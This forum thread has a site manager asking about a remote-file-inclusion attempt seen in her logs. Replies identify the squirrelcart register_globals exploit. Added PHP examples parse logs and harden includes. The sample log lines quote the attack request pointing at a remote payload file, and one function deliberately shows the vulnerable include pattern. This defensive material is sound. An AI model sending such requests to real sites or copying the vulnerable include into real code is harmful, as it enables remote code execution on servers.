Hack attempt? need advice

software development

#1

Hey folks, I could really use some advice from someone with more PHP experience than me. I apologize in advance for all the screenshots–I didn’t know as it’d be advisable to post the text of some of this.

Today I saw this odd URL in the logs for a site I’m managing for someone (and this isn’t one of my sites, so it’s not hosted at dreamhost so I can’t contact support about it–but I really am in over my head with this so I’m hoping someone here will help me anyway :slight_smile: )
screenshot of URL (where the proper store URL would’ve been http://example.com/store.php ). That URL was requested three times within a span of two minutes and ten seconds from three different IP addresses.

The http://ip address/dir/remote.txt? part of the URL yields a page that looks like it’s trying to inject a script that does…well, I have no idea what. Screenshot of that script passthru() works sorta like exec(), right? I’m slightly freaked about what might be happening especially after going to the URL that was being fetched by that script. I don’t really follow what’s happening in it.

I’m trying to figure out:

  • what someone is attempting to exploit here
  • how I might figure out whether the attempt succeeded or not
  • what I need to go learn in order to make sure that the code I’m writing isn’t easily exploitable.

Nothing on the site was defaced, the crontab file is empty, and there’s nothing fishy-looking in the tmp directory (but there wouldn’t be, would there, based on what I could make of the script in that screenshot?)

Any advice would be much appreciated…

~Daisy
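One way to answer the "did it succeed, and from where" question in the first post is to pull every request whose query-string value is itself a URL (the shape of the request Daisy saw) and list the client address and the status the server returned. The script below is an added example, not code from the thread; the three log lines are constructed in combined log format, and the addresses, paths and parameter name are placeholders.

```php
<?php
// Added example: triage access-log lines for remote-file-inclusion attempts,
// i.e. requests where a query parameter carries a full URL. The sample lines
// below are constructed; IPs, paths and the parameter name are placeholders.
$sampleLog = <<<'LOG'
203.0.113.10 - - [10/Oct/2007:13:55:36 -0700] "GET /store.php?site_isp_root=http://198.51.100.7/dir/remote.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
203.0.113.22 - - [10/Oct/2007:13:56:01 -0700] "GET /store.php?item=42 HTTP/1.1" 200 8133 "-" "Mozilla/5.0"
198.51.100.44 - - [10/Oct/2007:13:57:40 -0700] "GET /store.php?site_isp_root=http://198.51.100.7/dir/remote.txt? HTTP/1.1" 200 5120 "-" "libwww-perl/5.805"
LOG;

// Minimal parser for the common/combined log format: client IP, timestamp,
// method, request target and status code. Returns null for unparseable lines.
function parseCombinedLogLine(string $line): ?array
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5]];
}

// Return the query parameters whose value starts with a URL scheme.
// A trailing "?" on such a value is typical: it turns the rest of the
// include path into a query string for the remote host.
function findRemoteUrlParams(string $target): array
{
    $query = parse_url($target, PHP_URL_QUERY);
    if (!is_string($query) || $query === '') {
        return [];
    }
    parse_str($query, $params);
    $hits = [];
    foreach ($params as $name => $value) {
        if (is_string($value) && preg_match('#^(https?|ftp)://#i', $value)) {
            $hits[$name] = $value;
        }
    }
    return $hits;
}

// Walk the log and collect one record per suspicious request.
function triageLog(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        $entry = parseCombinedLogLine($line);
        if ($entry === null) {
            continue;
        }
        $hits = findRemoteUrlParams($entry['target']);
        if ($hits !== []) {
            $findings[] = $entry + ['params' => $hits];
        }
    }
    return $findings;
}

$findings = triageLog($sampleLog);
printf("%d suspicious request(s) from %d distinct address(es)\n",
    count($findings), count(array_unique(array_column($findings, 'ip'))));
foreach ($findings as $f) {
    foreach ($f['params'] as $name => $url) {
        printf("%s  %-15s  HTTP %d  %s=%s\n", $f['time'], $f['ip'], $f['status'], $name, $url);
    }
}
```

A 200 here only tells you that store.php ran as usual; it does not by itself prove the remote file was fetched. The more telling evidence is in the PHP error log (a failed-open warning for that URL means the include was attempted and refused) and in whether allow_url_fopen / allow_url_include are on for the host.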


#2

Okay, I’m still reading the script that was fetched by that bit of code. It looks like a DDOS script? Ack.

~Daisy


#3

Okay, after this I promise I’m done replying to myself to add random info.

But in case anyone wants to have a look to see if the code to the page in question looks exploitable somehow, I yanked out all the identifying info and uploaded a text file: store.txt

It’s just a paypal shopping cart w/ a database query and a while statement to fill in item specifics, but since I wrote it myself I don’t know as I might have inadvertently left some sort of security flaw?

~Daisy


#4

Just a thought, but maybe this is how spammers get contact info to send those phishing emails about “your paypal account has been compromised”

I presume there is some identifying information available that is specific to your account in the live form. Perhaps you could post to a server side script so all of the relevant info isn’t readily visible on the net?

I would be willing to offer some more input if I had a better idea of what the live page looks like. Feel free to send me a PM if you’d rather not post a real link here.

BC Tech
Team Shocker


#5

This is why DreamHost disabled remote file access (opening files in PHP by URL).

$site_isp_root is a variable used by squirrelcart.

So if a PHP site has register globals on, remote file access on, and runs squirrelcart, squirrelcart would download that script.

Well, at least that is what I get from searching Google for ‘site_isp_root’.

So yes it is an exploit attempt. Your code is not vulnerable to this exploit of course.

:cool: Atropos | openvein.org
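To make the failure mode Atropos describes concrete (an include whose base path is a plain variable that register_globals can fill from the query string, on a host that allows remote file access), here is an added example that is neither Daisy's store.php nor squirrelcart's code. The fragile function shows the shape of the problem; the resolver beside it is one way to write the same include so that a request can neither point it at a remote URL nor climb out of the application directory. The page list and directory layout are assumptions for the demo.

```php
<?php
// Added example, not code from the thread or from squirrelcart.

// --- fragile pattern (for illustration only) ---
// With register_globals=On, a request such as ?site_isp_root=http://host/x?
// sets $site_isp_root before this code runs; with allow_url_fopen /
// allow_url_include on, include() fetches and executes the remote file.
function fragileInclude(): void
{
    global $site_isp_root;                         // may come straight from the request
    include $site_isp_root . '/lib/functions.php';
}

// --- hardened version ---
// 1. the base directory is fixed by the application, never taken from a variable
//    the request could populate;
// 2. the only request-controlled part is a short name checked against an allowlist;
// 3. the resolved path is verified to lie inside the base directory.
const ALLOWED_PAGES = ['store', 'cart', 'checkout'];   // assumed page names

function resolveIncludePath(string $baseDir, string $page): ?string
{
    if (!in_array($page, ALLOWED_PAGES, true)) {
        return null;                               // rejects URLs, "../", anything unexpected
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/pages/' . $page . '.php');
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;                               // resolved outside the base directory
    }
    return $path;
}

// Defence in depth: report which of the runtime settings named in the thread
// are enabled. register_globals no longer exists in current PHP, so ini_get()
// returns false for it there and it is simply not listed.
function riskyIniSettings(): array
{
    $enabled = [];
    foreach (['register_globals', 'allow_url_fopen', 'allow_url_include'] as $key) {
        if (filter_var(ini_get($key), FILTER_VALIDATE_BOOLEAN)) {
            $enabled[] = $key;
        }
    }
    return $enabled;
}

// Demo: a throwaway base directory with one real page, then three requests.
$base = sys_get_temp_dir() . '/include-demo-' . getmypid();
mkdir($base . '/pages', 0700, true);
file_put_contents($base . '/pages/store.php', "<?php echo \"store page\\n\";\n");

foreach (['store', 'http://198.51.100.7/dir/remote.txt?', '../../etc/passwd'] as $requested) {
    $path = resolveIncludePath($base, $requested);
    printf("%-40s => %s\n", $requested, $path === null ? 'rejected' : 'include ' . basename($path));
    if ($path !== null) {
        require $path;
    }
}
printf("risky ini settings enabled: %s\n", implode(', ', riskyIniSettings()) ?: 'none');

unlink($base . '/pages/store.php');
rmdir($base . '/pages');
rmdir($base);
```

The allowlist does most of the work: a value like the one in Daisy's log never reaches include() at all, so the allow_url_* settings stop being the only thing standing between a query string and remote code execution. The realpath prefix check is a second layer for the case where the list of pages is later replaced by something more dynamic.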